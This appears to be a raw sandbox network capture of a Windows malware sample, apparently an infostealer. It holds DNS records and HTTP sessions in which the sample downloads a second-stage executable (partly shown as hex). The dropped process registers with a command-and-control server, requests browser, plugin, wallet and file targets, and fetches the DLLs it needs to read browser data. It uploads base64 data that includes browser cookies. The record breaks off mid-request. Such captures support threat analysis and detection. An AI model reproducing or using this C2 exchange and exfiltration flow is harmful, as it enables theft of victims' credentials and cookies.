                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:28:04.352616072 CEST4970880192.168.2.5185.172.128.76
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Apr 23, 2024 09:28:00.438376904 CEST | 192.168.2.5 | 1.1.1.1 | 0xbc89 | Standard query (0) | note.padd.cn.com | A (IP address) | IN (0x0001) | false
Apr 23, 2024 09:28:01.428953886 CEST | 192.168.2.5 | 1.1.1.1 | 0xbc89 | Standard query (0) | note.padd.cn.com | A (IP address) | IN (0x0001) | false
Apr 23, 2024 09:28:22.343893051 CEST | 192.168.2.5 | 1.1.1.1 | 0xb20b | Standard query (0) | svc.iolo.com | A (IP address) | IN (0x0001) | false
Apr 23, 2024 09:28:27.885389090 CEST | 192.168.2.5 | 1.1.1.1 | 0xd330 | Standard query (0) | download.iolo.net | A (IP address) | IN (0x0001) | false
Apr 23, 2024 09:29:05.506022930 CEST | 192.168.2.5 | 1.1.1.1 | 0x714f | Standard query (0) | westus2-2.in.applicationinsights.azure.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Apr 23, 2024 09:28:01.557858944 CEST | 1.1.1.1 | 192.168.2.5 | 0xbc89 | No error (0) | note.padd.cn.com | | 176.97.76.106 | A (IP address) | IN (0x0001) | false
Apr 23, 2024 09:28:01.557959080 CEST | 1.1.1.1 | 192.168.2.5 | 0xbc89 | No error (0) | note.padd.cn.com | | 176.97.76.106 | A (IP address) | IN (0x0001) | false
Apr 23, 2024 09:28:14.950088978 CEST | 1.1.1.1 | 192.168.2.5 | 0x70f4 | No error (0) | bg.microsoft.map.fastly.net | | 199.232.210.172 | A (IP address) | IN (0x0001) | false
Apr 23, 2024 09:28:14.950088978 CEST | 1.1.1.1 | 192.168.2.5 | 0x70f4 | No error (0) | bg.microsoft.map.fastly.net | | 199.232.214.172 | A (IP address) | IN (0x0001) | false
Apr 23, 2024 09:28:15.328742981 CEST | 1.1.1.1 | 192.168.2.5 | 0xa22e | No error (0) | fp2e7a.wpc.2be4.phicdn.net | fp2e7a.wpc.phicdn.net | | CNAME (Canonical name) | IN (0x0001) | false
Apr 23, 2024 09:28:15.328742981 CEST | 1.1.1.1 | 192.168.2.5 | 0xa22e | No error (0) | fp2e7a.wpc.phicdn.net | | 192.229.211.108 | A (IP address) | IN (0x0001) | false
Apr 23, 2024 09:28:22.449815035 CEST | 1.1.1.1 | 192.168.2.5 | 0xb20b | No error (0) | svc.iolo.com | | 20.157.87.45 | A (IP address) | IN (0x0001) | false
Apr 23, 2024 09:28:27.990607023 CEST | 1.1.1.1 | 192.168.2.5 | 0xd330 | No error (0) | download.iolo.net | iolo0.b-cdn.net | | CNAME (Canonical name) | IN (0x0001) | false
Apr 23, 2024 09:28:27.990607023 CEST | 1.1.1.1 | 192.168.2.5 | 0xd330 | No error (0) | iolo0.b-cdn.net | | 185.93.1.244 | A (IP address) | IN (0x0001) | false
Apr 23, 2024 09:29:05.638653040 CEST | 1.1.1.1 | 192.168.2.5 | 0x714f | No error (0) | westus2-2.in.applicationinsights.azure.com | westus2-2.in.ai.monitor.azure.com | | CNAME (Canonical name) | IN (0x0001) | false
Apr 23, 2024 09:29:05.638653040 CEST | 1.1.1.1 | 192.168.2.5 | 0x714f | No error (0) | westus2-2.in.ai.monitor.azure.com | westus2-2.in.ai.privatelink.monitor.azure.com | | CNAME (Canonical name) | IN (0x0001) | false
Apr 23, 2024 09:29:05.638653040 CEST | 1.1.1.1 | 192.168.2.5 | 0x714f | No error (0) | westus2-2.in.ai.privatelink.monitor.azure.com | gig-ai-prod-westus2-0.trafficmanager.net | | CNAME (Canonical name) | IN (0x0001) | false
Apr 23, 2024 09:29:16.255341053 CEST | 1.1.1.1 | 192.168.2.5 | 0x249e | No error (0) | windowsupdatebg.s.llnwi.net | | 69.164.42.0 | A (IP address) | IN (0x0001) | false
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 49705 | 185.172.128.90 | 80 | 5148 | C:\Users\user\Desktop\4BfhCycV4B.exe
Timestamp | Bytes transferred | Direction | Data
Apr 23, 2024 09:27:56.592477083 CEST | 206 | OUT | GET /cpa/ping.php?substr=eight&s=ab&sub=0 HTTP/1.1
Host: 185.172.128.90
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.129 Safari/537.36
Apr 23, 2024 09:27:58.174693108 CEST | 148 | IN | HTTP/1.1 200 OK
Date: Tue, 23 Apr 2024 07:27:56 GMT
Server: Apache/2.4.52 (Ubuntu)
Content-Length: 1
Content-Type: text/html; charset=UTF-8
Data Raw: 30
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.5 | 49706 | 185.172.128.228 | 80 | 5148 | C:\Users\user\Desktop\4BfhCycV4B.exe
Timestamp | Bytes transferred | Direction | Data
Apr 23, 2024 09:27:58.389693022 CEST | 192 | OUT | GET /ping.php?substr=eight HTTP/1.1
Host: 185.172.128.228
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.129 Safari/537.36
Apr 23, 2024 09:27:58.592356920 CEST | 147 | IN | HTTP/1.1 200 OK
Date: Tue, 23 Apr 2024 07:27:58 GMT
Server: Apache/2.4.52 (Ubuntu)
Content-Length: 0
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.5 | 49707 | 185.172.128.59 | 80 | 5148 | C:\Users\user\Desktop\4BfhCycV4B.exe
Timestamp | Bytes transferred | Direction | Data
Apr 23, 2024 09:27:58.807173014 CEST | 181 | OUT | GET /syncUpd.exe HTTP/1.1
Host: 185.172.128.59
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.129 Safari/537.36
Apr 23, 2024 09:27:59.010128021 CEST | 1289 | IN | HTTP/1.1 200 OK
Date: Tue, 23 Apr 2024 07:27:58 GMT
Server: Apache/2.4.52 (Ubuntu)
Last-Modified: Tue, 23 Apr 2024 07:15:01 GMT
ETag: "52200-616be4ffa1b6b"
Accept-Ranges: bytes
Content-Length: 336384
Content-Type: application/x-msdos-program
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:27:59.010277987 CEST1289INData Raw: f3 0f 7e 0e 83 e9 08 8d 76 08 66 0f d6 0f 8d 7f 08 8b 04 8d 78 25 40 00 ff e0 f7 c7 03 00 00 00 75 15 c1 e9 02 83 e2 03 83 f9 08 72 2a f3 a5 ff 24 95 78 25 40 00 90 8b c7 ba 03 00 00 00 83 e9 04 72 0c 83 e0 03 03 c8 ff 24 85 8c 24 40 00 ff 24 8d
                                                                                                                                                                                                                                                                                      Data Ascii: ~vfx%@ur*$x%@r$$@$%@$%@$@$@$@#FGFGr$x%@I#FGr$x%@#r$x%@Io%@\%@T%@L%@D%@<%@
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:27:59.010297060 CEST1289INData Raw: 00 eb 06 8b 47 04 89 46 04 5f 8b c6 5e 5d c2 04 00 55 8b ec 56 8b f1 c7 06 34 00 41 00 e8 52 00 00 00 f6 45 08 01 74 07 56 e8 e2 09 00 00 59 8b c6 5e 5d c2 04 00 55 8b ec 83 7d 08 00 53 8b d9 74 2d 57 ff 75 08 e8 db 06 00 00 8d 78 01 57 e8 ea 19
                                                                                                                                                                                                                                                                                      Data Ascii: GF_^]UV4AREtVY^]U}St-WuxWCYYtuWPiC_[]V~tveYfF^Au<AWVt$L$|$;v;h%PCs3u%`
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:27:59.010314941 CEST1289INData Raw: 40 00 8d 49 00 68 2e 40 00 70 2e 40 00 78 2e 40 00 80 2e 40 00 88 2e 40 00 90 2e 40 00 98 2e 40 00 ab 2e 40 00 8b 44 8e 1c 89 44 8f 1c 8b 44 8e 18 89 44 8f 18 8b 44 8e 14 89 44 8f 14 8b 44 8e 10 89 44 8f 10 8b 44 8e 0c 89 44 8f 0c 8b 44 8e 08 89
                                                                                                                                                                                                                                                                                      Data Ascii: @Ih.@p.@x.@.@.@.@.@.@DDDDDDDDDDDDDD$.@.@.@.@.@D$^_FGD$^_IFGFGD$^_FGFGFGD$^_$Wte$fof
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:27:59.010333061 CEST1289INData Raw: fc ff ff 55 8b ec 6a 0a 6a 00 ff 75 08 e8 6e 21 00 00 83 c4 0c 5d c3 6a 10 68 88 4d 41 00 e8 11 12 00 00 83 cf ff 89 7d e4 33 c0 39 45 08 0f 95 c0 85 c0 75 18 e8 9e 0f 00 00 c7 00 16 00 00 00 e8 24 0f 00 00 8b c7 e8 2d 12 00 00 c3 e8 70 14 00 00
                                                                                                                                                                                                                                                                                      Data Ascii: Ujjun!]jhMA}39Eu$-p @@uYP"Y;ttpCXeA@$u;ttpCXeAB$u PjCYYe PEu1 PVju
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:27:59.010350943 CEST1289INData Raw: d6 89 45 d8 ff 35 90 26 02 04 ff d6 8b 4d d8 39 4d e4 75 05 39 45 e0 74 ae 89 4d e4 8b d9 89 5d d4 89 45 e0 8b f8 eb 9c 68 e4 f1 40 00 68 d4 f1 40 00 e8 bb fe ff ff 59 59 68 ec f1 40 00 68 e8 f1 40 00 e8 aa fe ff ff 59 59 c7 45 fc fe ff ff ff e8
                                                                                                                                                                                                                                                                                      Data Ascii: E5&M9Mu9EtM]Eh@h@YYh@h@YYE }u)Cj'Yu\}tj'YUjju]Uul/YtugYt]jEE@PMh|LAEE@P}@
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:27:59.213397026 CEST1289INData Raw: ec 00 74 17 64 8b 1d 00 00 00 00 8b 03 8b 5d c8 89 03 64 89 1d 00 00 00 00 eb 09 8b 45 c8 64 a3 00 00 00 00 8b 45 fc 5b 8b e5 5d c3 55 8b ec 51 51 8b 45 08 53 8b 5d 0c 56 8b 70 0c 8b 48 10 89 4d f8 89 75 fc 57 8b fe 85 db 78 33 8b 55 10 83 fe ff
                                                                                                                                                                                                                                                                                      Data Ascii: td]dEdE[]UQQES]VpHMuWx3Uu)*MUNk9T};T~u}KuyEF0E8E;xw;v)Mk_^[]UQSEEddE]mc[]UQQSVWd5uEd>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.5 | 49708 | 185.172.128.76 | 80 | 6300 | C:\Users\user\AppData\Local\Temp\u3z0.0.exe
Timestamp | Bytes transferred | Direction | Data
Apr 23, 2024 09:28:00.837763071 CEST | 417 | OUT | POST /3cd2b41cbde8fc9c.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----JEGHJKFHJJJKJJJJKEHC
Host: 185.172.128.76
Content-Length: 216
Connection: Keep-Alive
Cache-Control: no-cache
Data Ascii: ------JEGHJKFHJJJKJJJJKEHCContent-Disposition: form-data; name="hwid"59C3C005F9E64120021454------JEGHJKFHJJJKJJJJKEHCContent-Disposition: form-data; name="build"default10------JEGHJKFHJJJKJJJJKEHC--
Apr 23, 2024 09:28:01.222677946 CEST | 347 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Tue, 23 Apr 2024 07:28:01 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 152
Connection: keep-alive
Vary: Accept-Encoding
Data Ascii: OTM0YzM2MmYyMzQ1YjM4YWU0MzQ4OGFlYzA2YWNkMWU1ZTk5MjFlMDg4Y2M5MDYzMTU5NTBlMjcyOTY1N2FkNjc3NWJmZjk5fDE4MTgxNjZ8NTE5MTkxODg1LmZpbGV8MXwwfDF8MXwxfDF8MXwxfA==
Apr 23, 2024 09:28:01.224149942 CEST | 469 | OUT | POST /3cd2b41cbde8fc9c.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----FBFCGIDAKECGCBGDBAFI
Host: 185.172.128.76
Content-Length: 268
Connection: Keep-Alive
Cache-Control: no-cache
Data Ascii: ------FBFCGIDAKECGCBGDBAFIContent-Disposition: form-data; name="token"934c362f2345b38ae43488aec06acd1e5e9921e088cc906315950e2729657ad6775bff99------FBFCGIDAKECGCBGDBAFIContent-Disposition: form-data; name="message"browsers------FBFCGIDAKECGCBGDBAFI--
Apr 23, 2024 09:28:01.538180113 CEST | 1289 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Tue, 23 Apr 2024 07:28:01 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 1520
Connection: keep-alive
Vary: Accept-Encoding
Apr 23, 2024 09:28:01.539793015 CEST | 468 | OUT | POST /3cd2b41cbde8fc9c.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----BKECAEBGHDAEBFHIEGHI
Host: 185.172.128.76
Content-Length: 267
Connection: Keep-Alive
Cache-Control: no-cache
Data Ascii: ------BKECAEBGHDAEBFHIEGHIContent-Disposition: form-data; name="token"934c362f2345b38ae43488aec06acd1e5e9921e088cc906315950e2729657ad6775bff99------BKECAEBGHDAEBFHIEGHIContent-Disposition: form-data; name="message"plugins------BKECAEBGHDAEBFHIEGHI--
Apr 23, 2024 09:28:01.851963997 CEST | 1289 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Tue, 23 Apr 2024 07:28:01 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 5416
Connection: keep-alive
Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:28:01.875792980 CEST202OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                                                                                                                                                      Content-Type: multipart/form-data; boundary=----DAAAKFHIEGDGCAAAEGDG
                                                                                                                                                                                                                                                                                      Host: 185.172.128.76
                                                                                                                                                                                                                                                                                      Content-Length: 6871
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:28:01.875838041 CEST6871OUTData Raw: 2d 2d 2d 2d 2d 2d 44 41 41 41 4b 46 48 49 45 47 44 47 43 41 41 41 45 47 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 33 34 63 33 36
                                                                                                                                                                                                                                                                                      Data Ascii: ------DAAAKFHIEGDGCAAAEGDGContent-Disposition: form-data; name="token"934c362f2345b38ae43488aec06acd1e5e9921e088cc906315950e2729657ad6775bff99------DAAAKFHIEGDGCAAAEGDGContent-Disposition: form-data; name="file_name"c3lzdGVtX2luZ
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:28:02.204765081 CEST170INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                      Date: Tue, 23 Apr 2024 07:28:02 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:28:02.205513954 CEST93OUTGET /15f649199f40275b/sqlite3.dll HTTP/1.1
                                                                                                                                                                                                                                                                                      Host: 185.172.128.76
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:28:02.509706974 CEST1289INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                      Date: Tue, 23 Apr 2024 07:28:02 GMT
                                                                                                                                                                                                                                                                                      Content-Type: application/x-msdos-program
                                                                                                                                                                                                                                                                                      Content-Length: 1106998
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      Last-Modified: Mon, 05 Sep 2022 11:30:30 GMT
                                                                                                                                                                                                                                                                                      ETag: "10e436-5e7ec6832a180"
                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:28:05.259397030 CEST952OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                                                                                                                                                      Content-Type: multipart/form-data; boundary=----DAECAECFCAAEBFHIEHDG
                                                                                                                                                                                                                                                                                      Host: 185.172.128.76
                                                                                                                                                                                                                                                                                      Content-Length: 751
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                      Data Ascii: ------DAECAECFCAAEBFHIEHDGContent-Disposition: form-data; name="token"934c362f2345b38ae43488aec06acd1e5e9921e088cc906315950e2729657ad6775bff99------DAECAECFCAAEBFHIEHDGContent-Disposition: form-data; name="file_name"Y29va2llc1xHb29nbGUgQ2hyb21lX0RlZmF1bHQudHh0------DAECAECFCAAEBFHIEHDGContent-Disposition: form-data; name="file"Lmdvb2dsZS5jb20JVFJVRQkvCUZBTFNFCTE2OTkwMTE2MTUJMVBfSkFSCTIwMjMtMTAtMDQtMTMKLmdvb2dsZS5jb20JRkFMU0UJLwlGQUxTRQkxNzEyMjMwODE1CU5JRAk1MTE9RWY1dlBGR3ctTVpZbzVod2UtMFRoQVZzbGJ4Ym12ZFZad2NIbnFWeldIQVUxNHY1M01OMVZ2d3ZRcThiYVlmZzItSUF0cVpCVjVOT0w1cnZqMk5XSXFyejM3N1VoTGRIdE9nRS10SmFCbFVCWUpFaHVHc1FkcW5pM29USmcwYnJxdjFkamRpTEp5dlRTVWhkSy1jNUpXYWRDU3NVTFBMemhTeC1GLTZ3T2c0Cg==------DAECAECFCAAEBFHIEHDG--
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:28:05.578618050 CEST170INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                      Date: Tue, 23 Apr 2024 07:28:05 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      Apr 23, 2024 09:28:05.656409025 CEST560OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                                                                                                                                                      Content-Type: multipart/form-data; boundary=----BGDAKEHIIDGDAAKECBFB
                                                                                                                                                                                                                                                                                      Host: 185.172.128.76
                                                                                                                                                                                                                                                                                      Content-Length: 359
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                      Data Ascii: ------BGDAKEHIIDGDAAKECBFBContent-Disposition: form-data; name="token"934c362f2345b38ae43488aec06acd1e5e9921e088cc906315950e2729657ad6775bff99------BGDAKEHIIDGDAAKECBFBContent-Disposition: form-data; name="file_name"NTE5MTkxODg1LmZpbGU=------BGDAKEHIIDGDAAKECBFBContent-Disposition: form-data; name="file"------BGDAKEHIIDGDAAKECBFB--
Apr 23, 2024 09:28:05.986634970 CEST 170 IN HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                      Date: Tue, 23 Apr 2024 07:28:05 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                                                                                                                                      Connection: keep-alive
Apr 23, 2024 09:28:06.627954960 CEST 560 OUT POST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                                                                                                                                                      Content-Type: multipart/form-data; boundary=----IDHDGIEHJJJJEBGDAFHJ
                                                                                                                                                                                                                                                                                      Host: 185.172.128.76
                                                                                                                                                                                                                                                                                      Content-Length: 359
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                      Data Ascii: ------IDHDGIEHJJJJEBGDAFHJContent-Disposition: form-data; name="token"934c362f2345b38ae43488aec06acd1e5e9921e088cc906315950e2729657ad6775bff99------IDHDGIEHJJJJEBGDAFHJContent-Disposition: form-data; name="file_name"NTE5MTkxODg1LmZpbGU=------IDHDGIEHJJJJEBGDAFHJContent-Disposition: form-data; name="file"------IDHDGIEHJJJJEBGDAFHJ--
Apr 23, 2024 09:28:06.952019930 CEST 170 IN HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                      Date: Tue, 23 Apr 2024 07:28:06 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                                                                                                                                      Connection: keep-alive
Apr 23, 2024 09:28:07.270808935 CEST 93 OUT GET /15f649199f40275b/freebl3.dll HTTP/1.1
                                                                                                                                                                                                                                                                                      Host: 185.172.128.76
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
Apr 23, 2024 09:28:07.575079918 CEST 1289 IN HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                      Date: Tue, 23 Apr 2024 07:28:07 GMT
                                                                                                                                                                                                                                                                                      Content-Type: application/x-msdos-program
                                                                                                                                                                                                                                                                                      Content-Length: 685392
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                                                                                                                                                                                                                                                      ETag: "a7550-5e7e950876500"
                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                      Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!4p@AHSxFP/# @.text `.rdata @@.data<F0@.00cfg@@.rsrcx@@.reloc#$"@B
Apr 23, 2024 09:28:08.839369059 CEST 93 OUT GET /15f649199f40275b/mozglue.dll HTTP/1.1
                                                                                                                                                                                                                                                                                      Host: 185.172.128.76
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
Apr 23, 2024 09:28:09.147047997 CEST 1289 IN HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                      Date: Tue, 23 Apr 2024 07:28:09 GMT
                                                                                                                                                                                                                                                                                      Content-Type: application/x-msdos-program
                                                                                                                                                                                                                                                                                      Content-Length: 608080
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                                                                                                                                                                                                                                                      ETag: "94750-5e7e950876500"
                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                      Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!^j@A`W, P/0AShZ.texta `.rdata@@.dataD@.00cfg@@.tls@.rsrc @@.relocA0B@B
Apr 23, 2024 09:28:09.779910088 CEST 94 OUT GET /15f649199f40275b/msvcp140.dll HTTP/1.1
                                                                                                                                                                                                                                                                                      Host: 185.172.128.76
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
Apr 23, 2024 09:28:10.086596966 CEST 1289 IN HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                      Date: Tue, 23 Apr 2024 07:28:09 GMT
                                                                                                                                                                                                                                                                                      Content-Type: application/x-msdos-program
                                                                                                                                                                                                                                                                                      Content-Length: 450024
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                                                                                                                                                                                                                                                      ETag: "6dde8-5e7e950876500"
                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                      Data Ascii: MZ@!L!This program cannot be run in DOS mode.$1C___)n__^"_^_\_[_Z____]_Rich_PEL0]"!(`@,@AgrA=`x8w@pc@.text&( `.dataH)@,@.idatapD@@.didat4X@.rsrcZ@@.reloc=>^@B
Apr 23, 2024 09:28:10.681339025 CEST 90 OUT
GET /15f649199f40275b/nss3.dll HTTP/1.1
Host: 185.172.128.76
Cache-Control: no-cache

Apr 23, 2024 09:28:10.989214897 CEST 1289 IN
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Tue, 23 Apr 2024 07:28:10 GMT
Content-Type: application/x-msdos-program
Content-Length: 2046288
Connection: keep-alive
Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
ETag: "1f3950-5e7e950876500"
Accept-Ranges: bytes

Apr 23, 2024 09:28:13.005757093 CEST 94 OUT
GET /15f649199f40275b/softokn3.dll HTTP/1.1
Host: 185.172.128.76
Cache-Control: no-cache

Apr 23, 2024 09:28:13.310272932 CEST 1289 IN
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Tue, 23 Apr 2024 07:28:13 GMT
Content-Type: application/x-msdos-program
Content-Length: 257872
Connection: keep-alive
Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
ETag: "3ef50-5e7e950876500"
Accept-Ranges: bytes

Apr 23, 2024 09:28:13.593606949 CEST 98 OUT
GET /15f649199f40275b/vcruntime140.dll HTTP/1.1
Host: 185.172.128.76
Cache-Control: no-cache

Apr 23, 2024 09:28:13.898395061 CEST 1289 IN
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Tue, 23 Apr 2024 07:28:13 GMT
Content-Type: application/x-msdos-program
Content-Length: 80880
Connection: keep-alive
Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
ETag: "13bf0-5e7e950876500"
Accept-Ranges: bytes

Apr 23, 2024 09:28:14.593592882 CEST 202 OUT
POST /3cd2b41cbde8fc9c.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----JEGHJKFHJJJKJJJJKEHC
Host: 185.172.128.76
Content-Length: 1067
Connection: Keep-Alive
Cache-Control: no-cache

Apr 23, 2024 09:28:14.923685074 CEST 170 IN
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Tue, 23 Apr 2024 07:28:14 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 0
Connection: keep-alive

Apr 23, 2024 09:28:14.957422018 CEST 468 OUT
POST /3cd2b41cbde8fc9c.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----BFHDHJKKJDHJJJJKEGHI
Host: 185.172.128.76
Content-Length: 267
Connection: Keep-Alive
Cache-Control: no-cache
Data Ascii:
------BFHDHJKKJDHJJJJKEGHI
Content-Disposition: form-data; name="token"

934c362f2345b38ae43488aec06acd1e5e9921e088cc906315950e2729657ad6775bff99
------BFHDHJKKJDHJJJJKEGHI
Content-Disposition: form-data; name="message"

wallets
------BFHDHJKKJDHJJJJKEGHI--

Apr 23, 2024 09:28:15.267060041 CEST 1289 IN
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Tue, 23 Apr 2024 07:28:15 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 2408
Connection: keep-alive
Vary: Accept-Encoding
Apr 23, 2024 09:28:15.287791014 CEST 466 OUT POST /3cd2b41cbde8fc9c.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----DAECAECFCAAEBFHIEHDG
Host: 185.172.128.76
Content-Length: 265
Connection: Keep-Alive
Cache-Control: no-cache
Data Ascii: ------DAECAECFCAAEBFHIEHDGContent-Disposition: form-data; name="token"934c362f2345b38ae43488aec06acd1e5e9921e088cc906315950e2729657ad6775bff99------DAECAECFCAAEBFHIEHDGContent-Disposition: form-data; name="message"files------DAECAECFCAAEBFHIEHDG--
Apr 23, 2024 09:28:15.598342896 CEST 1289 IN HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Tue, 23 Apr 2024 07:28:15 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 2052
Connection: keep-alive
Vary: Accept-Encoding
Apr 23, 2024 09:28:15.635740042 CEST 202 OUT POST /3cd2b41cbde8fc9c.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----EBFBKKJECAKEHJJJDBAF
Host: 185.172.128.76
Content-Length: 1759
Connection: Keep-Alive
Cache-Control: no-cache
Apr 23, 2024 09:28:15.960270882 CEST 170 IN HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Tue, 23 Apr 2024 07:28:15 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 0
Connection: keep-alive
Apr 23, 2024 09:28:15.969031096 CEST 202 OUT POST /3cd2b41cbde8fc9c.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----IDHCGDAFBKFIDHJJJDHC
Host: 185.172.128.76
Content-Length: 1743
Connection: Keep-Alive
Cache-Control: no-cache
Apr 23, 2024 09:28:16.300024033 CEST 170 IN HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Tue, 23 Apr 2024 07:28:16 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 0
Connection: keep-alive
Apr 23, 2024 09:28:16.313390970 CEST 202 OUT POST /3cd2b41cbde8fc9c.php HTTP/1.1
